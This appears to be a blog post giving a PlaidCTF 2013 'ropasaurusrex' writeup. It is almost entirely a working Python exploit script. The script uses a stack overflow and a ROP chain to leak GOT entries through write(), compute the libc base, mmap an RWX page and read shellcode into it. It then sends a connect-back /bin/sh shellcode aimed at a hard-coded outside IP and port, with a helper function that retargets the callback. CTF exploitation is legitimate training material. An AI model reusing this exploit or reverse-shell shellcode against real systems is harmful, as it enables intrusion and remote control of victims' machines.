PlaidCTF 2013 — "ropasaurusrex" (pwn) writeup: GOT leak via write(), libc base recovery, mmap() an RWX page, read() shellcode into it.


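#!/usr/bin/env python
"""PlaidCTF 2013 "ropasaurusrex" exploit (x86 Linux, ret2plt/ret2libc + mmap'd shellcode).

Flow, exactly as the original script did it:

  1. Stage 1 overflows the stack buffer (140 bytes to the saved return
     address), returns into write@plt to dump the three GOT entries at
     got_start..got_end to fd 1, then returns into the vulnerable function
     so a second payload can be sent.
  2. The second leaked dword minus a libc-specific offset gives the libc
     base; mmap() is the base plus another offset.
  3. Stage 2 returns into mmap() to map an RWX page at WADDR, then into
     read@plt to pull the shellcode into that page, with WADDR itself as
     read()'s return address.
  4. The shellcode is sent; it connects back to a listener and spawns
     /bin/sh.

Every address and offset below is specific to the 2013 target binary and
its libc and must be re-derived for any other build.  Payloads are bytes
throughout, so the script runs unchanged under Python 2 and 3.
"""
from socket import AF_INET, SOCK_STREAM, inet_aton, socket
from struct import pack, unpack


# The CTF service (long gone; kept for the record).
TARGET = ("54.234.151.114", 1025)

# Addresses inside the non-PIE binary.  pop11ret/pop4ret look like the
# "add esp, 0x1c; pop ebx; pop esi; pop edi; pop ebp; ret" tail of
# __libc_csu_init and its last four pops -- verify with objdump before reuse.
pop11ret = 0x080484B2   # discards 11 dwords: mmap()'s 6 args + 5 filler dwords
pop4ret = 0x080484B5    # discards 4 dwords: write()'s 3 args + 1 filler dword
read = 0x0804832C       # read@plt (presumably; confirm in .plt)
vuln_again = 0x80483f4  # the vulnerable function, re-entered after stage 1
write = 0x804830C       # write@plt (presumably; confirm in .plt)
got_start = 0x8049610
got_end = 0x804961C     # 12 bytes = three GOT entries are leaked

# libc-relative offsets for the target's libc (2013 CTF box).
LEAK_TO_LIBC_BASE = 0xBF190  # distance from the 2nd leaked GOT entry to libc base
LIBC_MMAP_OFF = 0xCA7B0      # mmap() relative to libc base

# Where stage 2 maps the RWX page; also read()'s destination and the
# address execution is transferred to afterwards.
WADDR = 0x13370000
WADDR_SIZE = 4096
W_FD = 1   # the service's stdout is the socket, so the leak comes back to us
R_FD = 0   # ... and its stdin is where the shellcode is read from

# mmap(2) constants (Linux/x86).
PROT_RWX = 7                # PROT_READ | PROT_WRITE | PROT_EXEC
MAP_SHARED_FIXED_ANON = 49  # MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS (0x31)

# Padding: 140 bytes up to the saved return address.  The original script
# padded stage 1 to 253 bytes and stage 2 to 256; both lengths are kept.
RET_OFFSET = 140
STAGE1_LEN = 253
STAGE2_LEN = 256


def make_shellcode(host="115.21.117.222", port=6001):
    """Return the 71-byte x86 Linux connect-back /bin/sh shellcode.

    The bytes are the original payload with the hard-coded callback
    address and port replaced by the immediates for ``host``/``port``:
    socket(AF_INET, SOCK_STREAM, 0) via socketcall, a sockaddr_in built on
    the stack, connect(), dup2() of the socket onto fds 2..0, then
    execve("/bin//sh", ["/bin//sh", NULL], NULL).

    Args:
        host: dotted-quad IPv4 address the shell connects back to.
        port: TCP port of the listener (0..65535).

    Raises:
        OSError / socket.error: ``host`` is not a valid dotted quad.
        struct.error: ``port`` does not fit in 16 bits.
    """
    return (
        # xor ebx,ebx; mul ebx; push ebx; inc ebx; push ebx; push 2;
        # mov ecx,esp; mov al,0x66; int 0x80  -> socket(AF_INET, SOCK_STREAM, 0)
        b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
        # pop ebx (=2); pop esi; push <host>; push word <port>; push bx
        # -> sockaddr_in overwrites the old arg block ecx still points at
        b"\x5b\x5e\x68" + inet_aton(host) +
        b"\x66\x68" + pack(">H", port) +
        # push 16; push ecx; push eax; mov ecx,esp; inc ebx (=3, SYS_CONNECT);
        # push 0x66; pop eax; int 0x80  -> connect()
        b"\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80"
        # pop ecx; xchg ecx,ebx; mov al,0x3f; int 0x80; dec ecx; jns loop
        # -> dup2(sock, 2), dup2(sock, 1), dup2(sock, 0)
        b"\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9"
        # push eax (0); push "//sh"; push "/bin"; mov ebx,esp; push eax;
        # push ebx; mov ecx,esp; mov al,0x0b; int 0x80  -> execve()
        b"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
    )


# The shellcode the original script shipped: callback to 115.21.117.222:6001.
# Point it at your own listener with make_shellcode(host, port).
Shellcode = make_shellcode()


def build_stage1():
    """Return the stage-1 payload: leak the GOT via write(), then re-enter vuln.

    Chain (after the 140-byte pad): write@plt, pop4ret as its return
    address, write(W_FD, got_start, got_end - got_start), one filler dword
    eaten by pop4ret, then vuln_again.  Padded with 'A' to STAGE1_LEN.
    """
    chain = pack("<I", write)
    chain += pack("<I", pop4ret)      # write() returns here; clears its 3 args + filler
    chain += pack("<I", W_FD)
    chain += pack("<I", got_start)
    chain += pack("<I", got_end - got_start)
    chain += b"AAAA"                  # 4th dword popped by pop4ret
    chain += pack("<I", vuln_again)   # run the overflow a second time
    return b"A" * RET_OFFSET + chain + b"A" * (STAGE1_LEN - RET_OFFSET - len(chain))


def libc_base_from_leak(data):
    """Derive the libc base from the stage-1 leak.

    ``data`` is what the target wrote back: the bytes at got_start.  The
    second dword (offset 4..8) is taken as a libc pointer that sits
    LEAK_TO_LIBC_BASE bytes above the libc base on the target.

    Raises:
        ValueError: fewer than 8 bytes came back.  The original script
            would have died with an opaque struct.error here (or, worse,
            sent stage 2 built from garbage if recv() returned partial data).
    """
    if len(data) < 8:
        raise ValueError("short GOT leak: got %d bytes, need at least 8" % len(data))
    leaked = unpack("<I", data[4:8])[0]
    return leaked - LEAK_TO_LIBC_BASE


def build_stage2(libc_base):
    """Return the stage-2 payload: mmap() an RWX page, read() shellcode into it.

    Chain (after the 140-byte pad): mmap, pop11ret as its return address,
    mmap(WADDR, WADDR_SIZE, PROT_RWX, MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS,
    -1, 0), five filler dwords (pop11ret pops 11 in total), then read@plt
    with WADDR as its return address and read(R_FD, WADDR, WADDR_SIZE) as
    its arguments.  Padded with 'A' to STAGE2_LEN.

    Args:
        libc_base: libc load address as returned by libc_base_from_leak().
    """
    mmap_addr = libc_base + LIBC_MMAP_OFF

    chain = pack("<I", mmap_addr)
    chain += pack("<I", pop11ret)     # mmap() returns here; clears 6 args + 5 filler
    chain += pack("<6I", WADDR, WADDR_SIZE, PROT_RWX, MAP_SHARED_FIXED_ANON,
                  0xffffffff, 0)      # fd = -1, offset = 0
    chain += b"AAAABBBBCCCCDDDDEEEE"  # filler dwords 7..11 for pop11ret

    chain += pack("<I", read)
    chain += pack("<I", WADDR)        # read() "returns" into the freshly read shellcode
    chain += pack("<3I", R_FD, WADDR, WADDR_SIZE)
    return b"A" * RET_OFFSET + chain + b"A" * (STAGE2_LEN - RET_OFFSET - len(chain))


def main():
    """Run the exploit against TARGET: leak, compute libc, map + read, send shellcode."""
    sock = socket(AF_INET, SOCK_STREAM)
    try:
        sock.connect(TARGET)
        # sendall(): a plain send() may write only part of the payload.
        sock.sendall(build_stage1())
        leak = sock.recv(4096)
        libc_base = libc_base_from_leak(leak)
        print("libc base: 0x%08x" % libc_base)
        sock.sendall(build_stage2(libc_base))
        # The target is now inside read(R_FD, WADDR, WADDR_SIZE); whatever
        # arrives next lands in the RWX page and is executed.
        sock.sendall(Shellcode)
    finally:
        sock.close()


if __name__ == "__main__":
    main()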


 

by codexb | 2013/04/22 09:47 | SeLinux | 트랙백
